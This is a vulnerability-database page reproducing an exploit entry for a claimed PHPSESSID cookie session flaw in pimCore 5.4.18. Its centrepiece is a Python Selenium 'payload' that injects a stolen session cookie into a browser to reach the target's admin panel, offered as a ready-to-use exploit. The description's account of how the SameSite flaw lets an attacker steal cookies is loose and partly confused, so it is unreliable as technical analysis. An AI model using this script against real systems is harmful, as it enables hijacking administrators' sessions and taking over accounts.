Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

pimCore 5.4.18 - PHPSESSID cookie Session Exploit

🗓️ 12 Jan 2023 00:00:00Reported by nu11secur1tyType 
zdt
 zdt🔗 0day.today👁 325 Views

pimCore-5.4.18 - PHPSESSID cookie Session Exploit. Sensitive Cookie with Improper SameSite Attribute vulnerability. Attacker can steal and manipulate authenticated user session

Code
## Title: pimCore-5.4.18-skeleton Sensitive Cookie with Improper SameSite Attribute - PHPSESSID cookie Session vulnerability 
## Author: nu11secur1ty
## Vendor: https://pimcore.com/en
## Software: https://packagist.org/packages/pimcore/skeleton
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton

## Description:
The pimCore-5.4.18-skeleton suffers from Sensitive Cookie with Improper SameSite Attribute vulnerability - PHPSESSID cookie Session management connection requests are not sanitizing correctly.
There are no securing changes in PHPSESSID cookies for every request - validating sessions and changing a cookie for every connection - POST Request.
The attacker in the same network can trick the user - the administrator of this system and can steal his cookie, 
then he can make very evil things by using the same session from the name of the already authenticated user - administrator, on a couple of PCs with different IPs which are used from different machines into that network. 
When the attacker steals the cookie, he can manipulate the same session, for example, he can log out or do very malicious stuff.
This is a very stupid developer's error, and this can be very dangerous for the owner of the system. 
The attack is possible also in the external network! 

## STATUS: HIGH Vulnerability

[+] Payload:

```Python
#!/usr/bin/python3
# @nu11secur1ty 2023
import time
from selenium import webdriver

driver = webdriver.Chrome()
print("Give the stolen cookie...\n")
cookie = input()
print("Give the domain or IP of the owner of the cookie...\n")
target = input()

driver.maximize_window()
driver.get(target+ 'admin/?_dc=1673370965&perspective=')
driver.add_cookie({'name': 'PHPSESSID', 'value': cookie})

print(driver.get_cookie('PHPSESSID'))
driver.get(target+ 'admin/?_dc=1673370965&perspective=')

time.sleep(3)
print("Press any key to stop the exploit...\n")
input()

print("Your PHPSESSID is PWNED")
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton)

## Reference:
[href](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions)

## Proof and Exploit:
[href](https://streamable.com/lorw8x)

## Time spent
`03:00:00`

## Writing an exploit
`00:25:00`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jan 2023 00:00Current
7.4High risk
Vulners AI Score7.4
pimcore-5.4.18phpsessid cookiesamesite attributesession managementvulnerabilityexploitnetwork-based_attackexploitingcookiessecurity_flaw
325